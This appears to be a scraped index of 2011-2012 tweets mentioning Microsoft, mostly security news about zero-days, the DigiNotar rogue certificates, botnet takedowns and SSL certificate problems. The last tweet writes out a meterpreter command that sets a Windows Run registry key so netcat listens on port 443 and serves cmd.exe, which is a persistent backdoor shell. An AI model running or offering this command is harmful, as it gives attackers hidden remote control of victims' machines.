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Index filtré des Tweets pour le terme microsoft (893 résultats)S'abonner au fil RSS Twitter pour le terme microsoft[2012-09-21] - 02:43:41 - "innismir" - RT @threatagent: Make sure your system is fully patched before applying the IE 0day Fix It #microsoft #metasploit[2012-09-20] - 23:49:53 - "zate" - RT @threatagent: Make sure your system is fully patched before applying the IE 0day Fix It #microsoft #metasploit[2012-09-20] - 12:17:10 - "websense" - Microsoft prepping fix for Internet Explorer zero-day exploit via @InfosecurityMag http://t.co/vbzpxnIC #microsoft #zeroday #infosec[2012-09-17] - 19:31:38 - "w3af" - @my4ng3l introducing risk based on owasp/microsoft's good practices[2012-09-11] - 22:24:53 - "mosesrenegade" - RT @taosecurity: I remember @microsoft suffered DNS-centric DDoS, like @godaddy. Date: 25 Jan 2001, possible due to poor network design. ...[2012-08-07] - 00:09:15 - "hypatiadotca" - RT @strcpy: some hipster should write a javascript version of microsoft comic chat.[2012-06-22] - 08:44:09 - "Ivanlef0u" - RT @ryanaraine: microsoft finds a local code execution vuln in google chrome http://t.co/Omzuw38Z -- insecure loading of NPAPI plugin[2012-06-21] - 23:29:53 - "ryanaraine" - microsoft finds a local code execution vuln in google chrome http://t.co/Omzuw38Z -- insecure loading of NPAPI plugin[2012-06-20] - 01:13:44 - "thedarktangent" - RT @mikko: SSL certificate report for www?update?microsoft?com: http://t.co/wUagwzjU #F -- Yow![2012-06-19] - 00:11:25 - "netik" - SSL certificate report for www?update?microsoft?com: https://t.co/vhg3EtOD #FAIL[2012-06-18] - 11:48:24 - " y0ug" - RT @PhysicalDrive0: update.microsoft .com SSL warnings due to certificate chain update http://t.co/p3HKkG7l[2012-06-18] - 09:12:28 - " sambowne" - Ty @mikko: SSL certificate report for www?update?microsoft?com: http://t.co/BbcwhlXn[2012-06-12] - 06:04:04 - "lmwalsh2112" - Fractal clouds taking root in the reseller channel: http://t.co/rzrLzRA3 #ibm #google #microsoft[2012-05-16] - 09:25:19 - "lmwalsh2112" - In defense of Microsoft's Steve Ballmer, CIsco's John Chambers: http://t.co/cpe3BlTW #microsoft #mspartners #cisco_us_channels[2012-04-07] - 16:55:24 - " ChristiaanBeek" - Cloud Security Daily is out! http://t.co/HtkUn5Ii ? Top stories today via @microsoft_gov[2012-03-27] - 22:10:37 - " DennisF" - Podcast with Richard Boscovich of @microsoftdcu on #zeus botnet takedown. http://t.co/hpGHygD9[2012-03-07] - 04:33:24 - "RPetrowsky" - RT @Clustermvp: Step-by-Step: Demonstrate DNSSEC in a Test Lab #microsoft #dns #win8http://t.co/rGZAjGNv[2012-01-27] - 05:58:56 - " eEye" - January VEF winner announced. Takes home an Amazon Kindle Fire. http://t.co/RV6Zq8kE #patchtuesday #microsoft #security #hashDoS[2012-01-23] - 15:32:59 - "RPetrowsky" - RT @SasaKranjac: Reference Architecture for Private Cloud : http://t.co/eXv71oKz #cloud #mscloud #privatecloud #microsoft .. +1[2011-12-22] - 12:54:36 - "opexxx" - RT @carnal0wnage: [Shared Reader] Pen test and hack microsoft sql server (mssql) http://t.co/L4G90G0j #bm[2011-12-22] - 09:06:19 - " carnal0wnage" - [Shared Reader] Pen test and hack microsoft sql server (mssql) http://t.co/fglk0U3d[2011-12-20] - 18:41:45 - "RPetrowsky" - The Cloud on Your Terms: have you seen a lot of H20? Data Center - http://t.co/tc3p2ldy #cloud #cloudcomputing #datacenter #microsoft[2011-11-15] - 21:19:33 - "opexxx" - RT @MrSnakeOil: Just moved a microsoft mouse from one USB port to another. It's installing drivers. For 8 minutes so far.[2011-11-15] - 16:53:49 - " icesurfer" - RT @MrSnakeOil: Just moved a microsoft mouse from one USB port to another. It's installing drivers. For 8 minutes so far.[2011-11-03] - 04:03:00 - "RPetrowsky" - RT @whymicrosoft: 8 person company saves 40 hours a week with cloud solution http://t.co/WaQp3Okx #WhyMsft[2011-11-02] - 02:07:35 - " sintixerr" - duqu uses one microsoft 0day in word - liam o murchu from symantec at #tsacybercon[2011-11-02] - 01:45:05 - " DrInfoSec" - RT @ryanaraine: here we go. microsoft kernel 0day found in duqu attack. http://t.co/9MDdxApU[2011-11-02] - 01:33:04 - "security4all" - RT @ryanaraine: here we go. microsoft kernel 0day found in duqu attack. http://t.co/9MDdxApU[2011-11-01] - 20:37:57 - " ryanaraine" - here we go. microsoft kernel 0day found in duqu attack. http://t.co/9MDdxApU[2011-11-01] - 19:19:39 - " daveg_mtso" - RT @ryanaraine: here we go. microsoft kernel 0day found in duqu attack. http://t.co/fIVs18a7[2011-10-24] - 23:08:00 - "dave_rel1k" - @noxsec book says links to the web app...we cant repackage microsoft sql server, need to d/l that from microsoft[2011-10-05] - 10:45:00 - "JoelEsler" - ?@WeldPond: RT @MrToph: RT @jen_h: Massive DNS hack...whois google, apple, or microsoft right now...? Yahoo too.[2011-10-05] - 10:30:45 - "DennisF" - RT @securityninja: RT @WeldPond: RT @MrToph: RT @jen_h: Massive DNS hack...whois google, apple, or microsoft right now... http://t.co/G ...[2011-10-05] - 10:18:45 - "falconsview" - RT @jen_h: Massive DNS hack...whois google, apple, or microsoft right now...[2011-10-05] - 01:35:23 - "securityninja" - RT @WeldPond: RT @MrToph: RT @jen_h: Massive DNS hack...whois google, apple, or microsoft right now... http://t.co/GbjY4CsE[2011-10-04] - 23:19:13 - " virturity" - RT @WeldPond: RT @MrToph: RT @jen_h: Massive DNS hack...whois google, apple, or microsoft right now... Dont see anything, sorry[2011-10-01] - 07:13:03 - "i0n1c" - RT @ryanaraine: update: microsoft confirms faulty AV update deleted Chrome from about 3,000 Windows machines http://t.co/LQkuWKSL[2011-10-01] - 05:53:29 - "ryanaraine" - update: microsoft confirms faulty AV update deleted Chrome from about 3,000 Windows machines http://t.co/LQkuWKSL[2011-09-28] - 09:12:12 - " cesarcer" - RT @ryanaraine microsoft kills botnet linked to macdefender scareware, sexual exploitation of children http://t.co/DA0GCHK9[2011-09-28] - 06:56:49 - "taosecurity" - RT @arbornetworks: Microsoft Neutralizes Kelihos Botnet, Names Defendant in Case http://t.co/IIeN44n0 Props to @microsoft for this work![2011-09-28] - 00:42:55 - "ryanaraine" - microsoft kills botnet linked to macdefender scareware, sexual exploitation of children http://t.co/PoAviPpm[2011-09-27] - 05:37:23 - " msftsecresponse" - We've released SA2588513, addressing an issue in SSL3.0/TLS1.0. Customers are at minimal risk. http://t.co/26g0tqG6 #microsoft #security[2011-09-14] - 19:39:34 - "cudeso" - #wtf ; why do I need to quit firefox and chrome when updating #microsoft office on a mac?[2011-09-06] - 01:42:37 - "securityshell" - after one month my XSS on microsoft.com still works...what happens @randomdross ?[2011-09-05] - 20:27:13 - "getwired" - RT @EverythingMS: Microsoft: Spoof DigiNotar certificates were issued for microsoft.com and windowsupdate.com http://t.co/pVYv2HI[2011-09-05] - 04:57:35 - "mikkohypponen" - I just heard that the rogue certificates issued by Diginotar included certificates for www.update.microsoft.com and for *.windowsupdate.com.[2011-09-04] - 21:37:44 - "security4all" - RT @mikkohypponen: I just heard that the rogue certificates issued by Diginotar included certificates for www.update.microsoft.com and f ...[2011-09-04] - 20:45:10 - "gianlucaSB" - RT @mikkohypponen: I just heard that the rogue certificates issued by Diginotar included certificates for www.update.microsoft.com and f ...[2011-09-04] - 20:06:35 - "lvdeijk" - RT @mikkohypponen: I just heard that the rogue certificates issued by Diginotar included certificates for www.update.microsoft.com and f ...[2011-09-04] - 18:36:09 - " emgent" - The rogue certificates issued by Diginotar included certificates for www.update.microsoft.com and for *.windowsupdate.com. #FAIL[2011-09-02] - 16:47:04 - "lmwalsh2112" - Federal judge expected to issue ruling in favor Google's cloud protest against Microsoft: http://t.co/6H9xQtL #cloud #google #microsoft[2011-08-20] - 23:10:51 - " t0ka7a" - meterpreter reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:windowssystem32
c.exe -Ldp 443 -e cmd.exe'
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